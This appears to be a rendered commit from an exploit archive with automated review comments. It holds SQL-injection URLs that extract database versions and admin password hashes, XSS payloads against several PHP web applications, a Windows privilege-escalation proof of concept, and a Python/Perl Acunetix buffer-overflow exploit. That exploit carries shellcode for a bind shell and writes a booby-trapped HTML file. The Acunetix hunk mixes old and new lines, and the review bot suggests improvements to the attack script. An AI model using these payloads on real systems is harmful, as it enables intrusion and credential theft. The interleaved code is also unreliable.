https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01%20union%20all%20select(SLEEP(10)),2—%20-&date_to=2013-07-30
The integer value passed as a parameter to the “SLEEP” function can be increased or decreased to validate this finding.
Error based evaluation can be used to return the MySQL version as per the following examples:
https://127.0.0.1/geoloc/graph_geoloc2.php?year=2007&user=dsdds%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a);—%20-
https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2013-07-30
https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01&date_to=2013-07-30%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-
https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2&date_to=2%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-
https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((concat(0x3c7363726970743e616c6572742822,database%20version:,@@version,0x22293c2f7363726970743e)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
Response:
Duplicate entry 5.5.29-29.41 for key group_key
Pulling “admin” user password hashes:
https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select pass from alienvault.users where login=admin),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
Cross Site Scripting:
The following examples demonstrate the use of unfiltered MySQL errors as an XSS vector:
Vanilla XSS
https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01%20union%20select%200”<script>alert(GDS)</script>,2%20—%20-&date_to=2013-07-30
ASCII Encoded XSS Variant (useful in bypassing application layer filters)
https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01%20union%20select%200x27223e3c7363726970743e616c6572742831293c2f7363726970743e,2%20—%20-&date_to=2013-07-30
===========================================================
Recommendation
===========================================================
AlienVault deployments should be upgraded to the latest stable version. The issues documented in this disclosure have been remediated in AlienVault 4.3.2.

platforms/php/webapps/33008.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35071/info
LxBlog is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example URIs are available:
http://www.example.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
http://www.example.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]
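Review bot: The advisory names no affected LxBlog version and no fixed release, unlike the sibling entries added in this commit (33011 names PHP-Nuke 8.0.0, 33014 names Achievo 1.3.4), so a reader cannot tell whether a given deployment is in scope. A line after the source line such as `Affected versions: <not stated in BID 35071 - confirm with vendor>` would make the entry consistent with the others. The first example URI is also wrapped across three lines, which a reader may mistake for three separate requests; a note that it is a single request would avoid that.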

13
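--- a/platforms/php/webapps/33011.txt
+++ b/platforms/php/webapps/33011.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/35117/info
+PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+PHP-Nuke 8.0.0 is vulnerable; other versions may also be affected.
+The following sample request is available:
+GET http://www.example.com/PHP-Nuke-8.0/index.php HTTP/1.0
+Accept: */*
+referer: '+IF(False,'',SLEEP(5))+'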
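Review bot: The description says only that user-supplied data reaches an SQL query, but the sample request shows the tainted input is the `referer` request header rather than a URL or form parameter, which is the detail a defender needs in order to know which input to log, validate and monitor. Naming it in the prose, e.g. `The vulnerable input is the Referer request header.`, would make the entry self-describing without relying on the reader to parse the raw request.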


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35124/info
Vanilla is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Vanilla 1.1.8 are vulnerable.
http://www.example.com/ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1<script>alert(123)</script>

11
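--- a/platforms/php/webapps/33014.txt
+++ b/platforms/php/webapps/33014.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35140/info
+Achievo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+Achievo 1.3.4 is vulnerable; other versions may also be affected.
+http://www.example.com/achievo/index.php?"><script>alert(0)</script>
+http://www.example.com/achievo/dispatch.php?atknodetype=pim.pim&atkaction=<script>alert(document.cookie)</script>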


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35180/info
PHP-Nuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP-Nuke 8.0 is vulnerable; other versions may also be affected.
http://www.example.com/modules.php?name=Downloads&d_op=search&query=&#039;&#039;;!--"[script]alert(document.cookie)[/script]

17
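--- a/platforms/php/webapps/33022.txt
+++ b/platforms/php/webapps/33022.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/35189/info
+Joomla! is prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues affect the 'com_user' component, the 'JA_Purity' template, and the administrative panel in the 'Site client' subproject of the application.
+An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
+Versions prior to Joomla!1.5.11 are vulnerable.
+http://www.example.com/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?excludeModules=%27;alert(8);%20var%20b=%27
+http://www.example.com/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27
+http://www.example.com/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E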

17
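--- a/platforms/windows/local/33012.c
+++ b/platforms/windows/local/33012.c
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/35120/info
+Microsoft Windows is prone to a local privilege-escalation vulnerability.
+Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
+#include <windows.h>
+int main()
+{
+WCHAR c[1000] = {0};
+memset(c, ?c?, 1000);
+SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
+WCHAR b[1000] = {0};
+SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
+return 0;
+}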
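Review bot: `memset(c, ?c?, 1000);` contains what looks like a mis-encoded character literal — the quotes around the fill value appear to have been replaced by `?` during transcription — so the file as committed does not compile and no longer matches the PoC that BID 35120 describes; the line should be re-checked against the original submission rather than guessed at. The three lines of advisory prose above `#include <windows.h>` (the `source:` line and the two paragraphs) also sit outside any comment in a `.c` file, which other entries in this archive avoid by wrapping such text in `/* ... */`.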


@ -1,81 +1,150 @@
# Exploit Title: Acunetix Stack Based overflow
# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP
#!/usr/bin/python
# Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit
# Version: 8
# Build: 20120704
# Tested on: Windows XP SP2 en
# Vendor: http://www.acunetix.com/
# Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Exploit-Author: Osanda Malith
# Follow @OsandaMalith
# Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=RHaMx8K1GeM
# CVE: CVE-2014-2994
'''
Host the generated file in a server. The victim should select the external host. Otherwise we cannot trigger
the vulnerability.
'''
print ('[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit\n')
while True:
try:
choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n"))
except ValueError:
print "[!] Enter only a number"
continue
if choice == 1:
shellcode = ""
shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63"
shellcode += "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b"
shellcode += "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70"
shellcode += "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57"
shellcode += "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e"
shellcode += "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30"
shellcode += "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58"
shellcode += "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b"
shellcode += "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31"
shellcode += "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50"
shellcode += "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77"
shellcode += "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b"
shellcode += "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64"
shellcode += "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71"
shellcode += "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33"
shellcode += "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32"
shellcode += "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35"
shellcode += "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c"
shellcode += "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e"
shellcode += "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b"
shellcode += "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42"
shellcode += "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46"
shellcode += "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53"
shellcode += "\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b"
shellcode += "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45"
shellcode += "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d"
shellcode += "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65"
shellcode += "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b"
shellcode += "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61"
shellcode += "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53"
shellcode += "\x65\x50\x41\x41"
break
#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.
my $file= "index.html";
my $HTMLHeader1 = "<html>\r\n";
my $HTMLHeader2 = "\r\n</html>";
my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
my $IMGheader2 = "><br>\n";
elif choice == 2:
# Modify this part with your own custom shellcode
# msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP
shellcode = ""
shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x4b\x58\x6c\x49\x65\x50\x73\x30\x73\x30\x31"
shellcode += "\x70\x6e\x69\x48\x65\x70\x31\x59\x42\x55\x34\x4c\x4b"
shellcode += "\x42\x72\x76\x50\x6c\x4b\x73\x62\x76\x6c\x4c\x4b\x53"
shellcode += "\x62\x57\x64\x6e\x6b\x63\x42\x34\x68\x66\x6f\x48\x37"
shellcode += "\x30\x4a\x54\x66\x55\x61\x79\x6f\x55\x61\x4b\x70\x4c"
shellcode += "\x6c\x35\x6c\x30\x61\x33\x4c\x75\x52\x64\x6c\x67\x50"
shellcode += "\x6f\x31\x5a\x6f\x54\x4d\x47\x71\x48\x47\x6b\x52\x38"
shellcode += "\x70\x61\x42\x46\x37\x6e\x6b\x32\x72\x66\x70\x6e\x6b"
shellcode += "\x73\x72\x75\x6c\x73\x31\x4e\x30\x6e\x6b\x71\x50\x43"
shellcode += "\x48\x4b\x35\x49\x50\x61\x64\x72\x6a\x33\x31\x78\x50"
shellcode += "\x76\x30\x4c\x4b\x77\x38\x35\x48\x6e\x6b\x53\x68\x61"
shellcode += "\x30\x65\x51\x5a\x73\x69\x73\x77\x4c\x50\x49\x4e\x6b"
shellcode += "\x56\x54\x6e\x6b\x45\x51\x69\x46\x75\x61\x6b\x4f\x66"
shellcode += "\x51\x49\x50\x6c\x6c\x4b\x71\x78\x4f\x56\x6d\x35\x51"
shellcode += "\x4a\x67\x50\x38\x59\x70\x61\x65\x39\x64\x67\x73\x31"
shellcode += "\x6d\x6a\x58\x45\x6b\x43\x4d\x76\x44\x50\x75\x49\x72"
shellcode += "\x52\x78\x6e\x6b\x61\x48\x46\x44\x43\x31\x68\x53\x45"
shellcode += "\x36\x4e\x6b\x34\x4c\x42\x6b\x6e\x6b\x73\x68\x35\x4c"
shellcode += "\x57\x71\x6b\x63\x4c\x4b\x53\x34\x6c\x4b\x43\x31\x4e"
shellcode += "\x30\x4e\x69\x32\x64\x47\x54\x56\x44\x73\x6b\x61\x4b"
shellcode += "\x75\x31\x31\x49\x72\x7a\x76\x31\x59\x6f\x59\x70\x61"
shellcode += "\x48\x51\x4f\x31\x4a\x6c\x4b\x52\x32\x78\x6b\x6e\x66"
shellcode += "\x43\x6d\x42\x48\x67\x43\x45\x62\x37\x70\x63\x30\x72"
shellcode += "\x48\x42\x57\x32\x53\x76\x52\x31\x4f\x42\x74\x50\x68"
shellcode += "\x52\x6c\x64\x37\x64\x66\x44\x47\x39\x6f\x69\x45\x4d"
shellcode += "\x68\x5a\x30\x65\x51\x57\x70\x63\x30\x76\x49\x59\x54"
shellcode += "\x31\x44\x52\x70\x45\x38\x64\x69\x4f\x70\x50\x6b\x57"
shellcode += "\x70\x59\x6f\x7a\x75\x52\x70\x52\x70\x32\x70\x52\x70"
shellcode += "\x47\x30\x30\x50\x67\x30\x66\x30\x63\x58\x48\x6a\x54"
shellcode += "\x4f\x49\x4f\x69\x70\x79\x6f\x4e\x35\x4c\x57\x45\x61"
shellcode += "\x6b\x6b\x51\x43\x73\x58\x73\x32\x57\x70\x34\x51\x73"
shellcode += "\x6c\x6f\x79\x4a\x46\x42\x4a\x76\x70\x46\x36\x50\x57"
shellcode += "\x71\x78\x7a\x62\x4b\x6b\x70\x37\x72\x47\x6b\x4f\x48"
shellcode += "\x55\x62\x73\x51\x47\x72\x48\x4c\x77\x78\x69\x47\x48"
shellcode += "\x4b\x4f\x69\x6f\x48\x55\x30\x53\x52\x73\x53\x67\x45"
shellcode += "\x38\x62\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x5a\x75"
shellcode += "\x72\x77\x6c\x57\x62\x48\x54\x35\x50\x6e\x32\x6d\x35"
shellcode += "\x31\x4b\x4f\x69\x45\x61\x7a\x77\x70\x32\x4a\x73\x34"
shellcode += "\x62\x76\x61\x47\x70\x68\x63\x32\x78\x59\x4a\x68\x31"
shellcode += "\x4f\x49\x6f\x48\x55\x6e\x6b\x46\x56\x51\x7a\x71\x50"
shellcode += "\x62\x48\x65\x50\x46\x70\x63\x30\x43\x30\x31\x46\x32"
shellcode += "\x4a\x55\x50\x71\x78\x31\x48\x49\x34\x66\x33\x6b\x55"
shellcode += "\x59\x6f\x4e\x35\x4f\x63\x72\x73\x71\x7a\x37\x70\x30"
shellcode += "\x56\x70\x53\x71\x47\x45\x38\x74\x42\x38\x59\x6f\x38"
shellcode += "\x33\x6f\x49\x6f\x69\x45\x67\x71\x79\x53\x76\x49\x6b"
shellcode += "\x76\x6f\x75\x48\x76\x62\x55\x58\x6c\x49\x53\x41\x41"
my $DomainName1 = "XSS";
my $DomainName2 = "CSRF";
my $DomainName3 = "DeepScan";
my $DomainName4 = "NetworkScan";
my $DomainName5 = "DenialOfService";
my $GeneralDotPadding = "." x 190;
print "[+] Connect on port 4444"
break
else:
print "[-] Invalid Choice"
continue
my $ExploitDomain = "SQLInjection";
my $DotPadding = "." x (202-length($ExploitDomain));
my $Padding1 = "A"x66;
my $Padding2 = "B"x4;
my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).
head = ("<html>\
<body>\
<center><h1>Scan This Site and Get Pwned :)</h1></center><br>")
junk = ("\
<a href= \"http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAA")
edx = "500f"
junk2 = "BBBB"
# jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:\WINDOWS\system32\WINHTTP.dll)
eip = "\x49\x63\x52\x4d"
# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
my $shellcode2 =
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" .
"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" .
"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" .
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" .
"\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" .
"\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" .
"\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" .
"\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" .
"\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" .
"\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" .
"\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" .
"\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" .
"\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" .
"\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" .
"\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" .
"\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" .
"\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" .
"\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" .
"\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" .
"\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" .
"\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" .
"\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" .
"\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" .
"\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" .
"\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" .
"\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" .
"\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" .
"\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" .
"\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" .
"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" .
"\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" .
"\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" .
"\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";
my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;
my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;
open($FILE,">$file");
print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
close($FILE);
print "Acunetix Killer File Created successfully\n";
shellcode += "\">"
tail = ("<img src=\"http://i.imgur.com/BimAoR0.jpg\">\
</body>\
</html>")
exploit = head + junk + edx + junk2 + eip + shellcode + tail
filename = "Exploit.htm"
file = open(filename, "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file"
#EOF
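Review bot: In the new Python script the output file is written with `file = open(filename, "w")` followed by separate `write` and `close` calls, which shadows the `file` builtin and leaves the handle open if `write` raises; `with open(filename, "w") as out: out.write(exploit)` is the idiomatic form and makes the explicit `close` unnecessary. The rendered hunk has also lost its +/- markers and interleaves the old Perl statements (`my $file= "index.html";`, `open($FILE,">$file");`) with the new Python ones, so which of the two header blocks at the top of the hunk survives in the committed file cannot be read from this page and should be confirmed against the raw diff.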


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35236/info
LogMeIn is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sufficiently sanitize input.
By inserting arbitrary headers into an HTTP response, attackers may be able to launch various attacks, including cross-site request forgery, cross-site scripting, and HTTP-request smuggling.
LogMeIn 4.0.784 is vulnerable; other versions may also be affected.
The following example URI is available:
http://securethoughts.com/2009/06/multiple-vulnerabilities-in-logmein-web-interface-can-be-used-to-control-your-computer-and-steal-arbitary-files/#viewSource
http://www.example.com/cfgadvanced.html?op=update&DisconnectExisting=1&NoHttpCompr=1&CrashDumpInfo=0&lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21--